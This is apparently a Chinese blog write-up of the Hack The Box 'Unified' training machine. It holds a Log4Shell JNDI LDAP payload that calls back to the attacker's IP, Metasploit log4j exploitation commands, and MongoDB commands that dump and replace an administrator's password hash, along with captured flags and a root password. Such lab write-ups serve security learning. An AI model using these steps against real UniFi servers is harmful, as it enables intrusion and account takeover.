[StartingPoint][Tier2]Unified

2024-04-13 02:36
文章标签 unified startingpoint tier2

本文主要是介绍[StartingPoint][Tier2]Unified,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Task 1

Which are the first four open ports?

(开启了哪4个端口?)

$ namp -sC -sV -v 10.129.104.207

image.png

22,6789,8080,8443

Task 2

What is the title of the software that is running running on port 8443?

(8443端口运行什么软件?)

UniFi Network

Task 3

What is the version of the software that is running?

(运行的软件版本是什么?)

首先访问10.129.104.207:8080

image.png

6.4.54

Task 4

What is the CVE for the identified vulnerability?

(识别到的CVE版本是什么?)

image.png

CVE-2021-44228

Task 5

What protocol does JNDI leverage in the injection?

(JNDI (Java Naming and Directory Interface)在注入中利用了什么协议?)

抓包的时候代理设置本地vpn的IP

image.png

JNDI是Java命名和目录接口API的缩写。通过调用这个API,应用程序可以定位资源和其他程序对象。资源是提供到系统(如数据库服务器和消息传递系统)的连接的程序对象

LDAP是轻量级目录访问协议(Lightweight Directory Access Protocol)的缩写,它是一种开放的、独立于供应商的行业标准应用协议,用于通过Internet或网络访问和维护分布式目录信息服务。LDAP运行的默认端口是389

{"username": "admin","password": "admin","remember": "${jndi:ldap://10.10.16.6/whatever}","strict": true
}

image.png

点击“发送”后,“响应”窗格将显示来自请求的响应。输出显示了一条错误消息,指出有效负载无效,但是尽管有错误消息,有效负载实际上正在执行。

ldap

Task 6

What tool do we use to intercept the traffic, indicating the attack was successful?

(我们用什么工具来拦截流量,表明攻击已成功?)

  • tcpdump是一个在命令行界面下运行的数据网络数据包分析计算机程序。它允许用户显示在计算机所连接的网络上传输或接收的TCP/IP和其他数据包。

# tcpdump -i tun0 port 389

image.png

tcpdump输出显示在我们的机器上接收到一个连接。这证明该应用程序确实容易受到攻击,因为它试图通过LDAP端口389连接回我们

tcpdump

Task 7

What port do we need to inspect intercepted traffic for?

(我们需要检查拦截的流量的哪个端口?)

389

Task 8

What port is the MongoDB service running on?

(MongoDB服务运行在哪个端口?)

我们必须在我们的系统上安装Open-JDK和Maven,以便构建我们可以发送到服务器的有效载荷,并在易受攻击的系统上进行远程代码执行

$ msfconsole

使用msf的log4j漏洞利用模块

image.png

> search log4j
> use 2
> set rhosts 10.129.231.63
> set srvhost tun0
> set lhost tun0
> check -检查是否存在漏洞
> run

image.png

Ctrl+Z -后台运行

> search shell_to
> use 0
> sessions -l -查看会话
> set session 1 -设置会话,并且将普通shell提升至msf的shell
> run

image.png

session已经成功提升到msf的shell

> sessions -i 2 -进入msf的shell会话
meterpreter> shell -进入shell

ps aux|grep mongo - 查看进程mongo的信息

image.png

27117

Task 9

What is the default database name for UniFi applications?

(UniFi 应用程序的默认数据库名称是什么?)

让我们通过使用mongo命令行实用程序与MongoDB服务交互,并尝试提取管理员密码。使用关键字UniFi Default Database进行快速Google搜索,显示UniFi应用程序的默认数据库名称是ace。

ace

Task 10

What is the function we use to enumerate users within the database in MongoDB?

(我们在 MongoDB 中用来枚举数据库中的用户的函数是什么?)

image.png

$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

输出显示了一个名为Administrator的用户。他们的密码散列位于x_shadow变量中,但是在这种情况下,它不能被任何密码破解工具破解。相反,我们可以用自己创建的散列更改x_shadow密码散列,以替换管理员密码并向管理面板进行身份验证。为此,我们可以使用mkpasswd命令行实用程序。

image.png

db.admin.find()

Task 11

What is the function we use to update users within the database in MongoDB?

(我们在 MongoDB 中用来更新数据库中的用户的函数是什么?)

$ mkpasswd -m sha-512 s-h4ck13 -生成密码散列

image.png

$6$i2Bx4z4kMsLW5K2Y$2chqfNY/6YEqDvBjk4GEJKsZlh39tfdr73boSEI2RKzhLkfP.g.YRIvY2OQr1RESU3D2eIl/5A3cmZy5L2cKp/

6 6 6是正在使用的散列算法的标识符,在本例中是SHA-512,因此我们必须创建相同类型的散列

在msfshell中执行payload

$ mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$i2Bx4z4kMsLW5K2Y$2chqfNY/6YEqDvBjk4GEJKsZlh39tfdr73boSEI2RKzhLkfP.g.YRIvY2OQr1RESU3D2eIl/5A3cmZy5L2cKp/"}})' -替换管理员的密码

image.png

$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

再次查看管理员密码

image.png

已经改变

db.admin.update()

Task 12

What is the password for the root user?

(root用户的密码是什么?)

登录页面

username:administrator
password:s-h4ck13

image.png

来到setting->site选项卡下,可以看到ssh的root账户密码

image.png

NotACrackablePassword4U2022

User Flag

$ find / -name user.txt

image.png

$ cat /home/michael/user.txt

image.png

6ced1a6a89e666c0620cdb10262ba127

Root Flag

image.png

e50bc93c75b634e4b272d2f771c33681

这篇关于[StartingPoint][Tier2]Unified的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/898914

相关文章

UML- 统一建模语言(Unified Modeling Language)创建项目的序列图及类图

陈科肇 ============= 1.主要模型 在UML系统开发中有三个主要的模型: 功能模型:从用户的角度展示系统的功能,包括用例图。 对象模型:采用对象、属性、操作、关联等概念展示系统的结构和基础,包括类图、对象图、包图。 动态模型:展现系统的内部行为。 包括序列图、活动图、状态图。 因为要创建个人空间项目并不是一个很大的项目,我这里只须关注两种图的创建就可以了,而在开始创建UML图

Segmentation简记3-UPSNet: A Unified Panoptic Segmentation Network

Segmentation简记3-UPSNet: A Unified Panoptic Segmentation Network 创新点总结实验 创新点 1.统一的全景分割网络 总结 uber的作品 网络结构如下: 还是比较简洁的。 Backbone 采用了原始mask rcnn。 Instance Segmentation Head 使用了最大的特征图,包括bbox回归,分

[论文笔记]Circle Loss: A Unified Perspective of Pair Similarity Optimization

引言 为了理解CoSENT的loss,今天来读一下Circle Loss: A Unified Perspective of Pair Similarity Optimization。 为了简单,下文中以翻译的口吻记录,比如替换"作者"为"我们"。 这篇论文从对深度特征学习的成对相似度优化角度出发,旨在最大化同类之间的相似度 s p s_p s

Unified-IoU:用于高质量对象检测

摘要 https://arxiv.org/pdf/2408.06636 目标检测是计算机视觉领域的重要部分,而目标检测的效果直接由预测框的回归精度决定。作为模型训练的关键,交并比(IoU,Intersection over Union)极大地展示了当前预测框与真实框之间的差异。后续研究人员不断在IoU中加入更多考量因素,如中心距离、纵横比等。然而,仅仅细化几何差异存在上限;新的考量指标与IoU本

《You Only Look Once: Unified, Real-Time Object Detection》YOLO一种实时目标检测方法 阅读笔记(未完成版)

文章目录 1. one-stage与two-stage检测算法1. 模型过程1.1 grid cell1.2 bounding box与confidence score1.3 类别预测1.4 预测目标 2. 网络的学习2.1 网络输出的数据与预测集数据2.2 损失函数2.3 网络的设计 1. one-stage与two-stage检测算法 two-stage: one-st

从同—视角理解扩散模型(Understanding Diffusion Models A Unified Perspective)

从同—视角理解扩散模型 Understanding Diffusion Models A Unified Perspective【全公式推导】【免费视频讲解】 B站视频讲解 视频的论文笔记 从同一视角理解扩散模型【视频讲解笔记】 配合视频讲解的同步笔记。 整个系列完整的论文笔记内容如下,仅为了不用—一回复,共计14个视频讲解笔记,故设定了一个比较低的价格(粉丝仅6毛),大家可以自取。

《分析模式》漫谈03- Unified Method并不是RUP

DDD领域驱动设计批评文集 做强化自测题获得“软件方法建模师”称号 《软件方法》各章合集 在《分析模式》第2章 ,Fowler提到了“Rational Software's Unified Method”, 而且给出了引用的参考文献,是Rational公司的一份文档: 2004中译本的翻译如下: 翻译为“Rational软件的统一方法”是正确的。 2020中译本的翻

UPerNet 统一感知解析:场景理解的新视角 Unified Perceptual Parsing for Scene Understanding

论文题目:统一感知解析:场景理解的新视角 Unified Perceptual Parsing for Scene Understanding 论文链接:http://arxiv.org/abs/1807.10221(ECCV 2018) 代码链接:https://github.com/CSAILVision/unifiedparsing 一、摘要   研究了一个新的任务,称为统一感知解析

How To Purge The UNIFIED AUDIT TRAIL (Doc ID 1582627.1)

自动清理oracle数据库统一审计记录方案。 查询表空间使用率 SQL> Col tablespace_name for a30Col used_pct for a10Set line 120 pages 120select total.tablespace_name,round(total.MB, 2) as Total_MB,round(total.MB - free.MB, 2)